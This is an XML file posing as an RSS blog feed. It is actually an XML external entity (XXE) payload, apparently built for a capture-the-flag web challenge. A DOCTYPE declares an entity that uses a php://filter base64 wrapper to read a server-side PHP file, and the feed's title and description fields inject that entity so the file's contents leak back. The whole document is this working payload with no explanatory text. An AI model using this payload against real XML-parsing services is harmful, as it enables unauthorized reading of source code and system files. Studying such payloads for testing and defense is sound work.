files/dtd/rss.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/challenge/web-serveur/ch29/index.php">]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
    <title>The Blog</title>
    <link>http://example.com/</link>
    <description>A blog about things</description>
    <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
    <item>
        <id>10587361</id>
        <title>Title: &xxe;</title>
        <link>http://example.com</link>
        <description>a post: &xxe;</description>
        <author>author@example.com</author>
        <guid>http://vuln.be/</guid>
        <pubDate>Mon, 30 Jul 2018 15:09:00 +0300</pubDate>
        <synopsis></synopsis>
        <category>Feed</category>
        <source_name>HACKED1</source_name>
        <source_url>https://vuln.be</source_url>
    </item>
</channel>
</rss>